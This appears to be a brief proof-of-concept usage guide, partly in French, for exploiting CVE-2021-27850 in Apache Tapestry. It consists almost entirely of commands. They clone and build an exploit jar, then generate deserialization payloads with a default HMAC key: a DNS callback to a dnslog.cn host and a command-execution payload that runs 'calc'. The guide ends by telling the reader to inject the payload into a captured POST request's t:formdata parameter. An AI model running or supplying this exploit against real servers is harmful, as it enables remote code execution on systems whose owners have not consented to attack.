
PoC Apache Tapestry CVE-2021-27850
git clone https://github.com/Ovi3/CVE_2021_27850_POC.git
cd CVE_2021_27850_POC/
gradlew runnbaleJar
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar
[Usage]:
java TapestryExploit [Tapestry Key] DNS [URL]
java TapestryExploit [Tapestry Key] CB2 [Command]
# Supposons que la clé HMAC soit change this immediately
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" DNS "http://xxx.dnslog.cn"
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" CB2 "calc"
Accédez à l'application Tapestry, déclenchez une requête POST (par exemple une requête de connexion), capturez le paquet, modifiez la valeur du paramètre t:formdata avec le payload généré ci-dessus.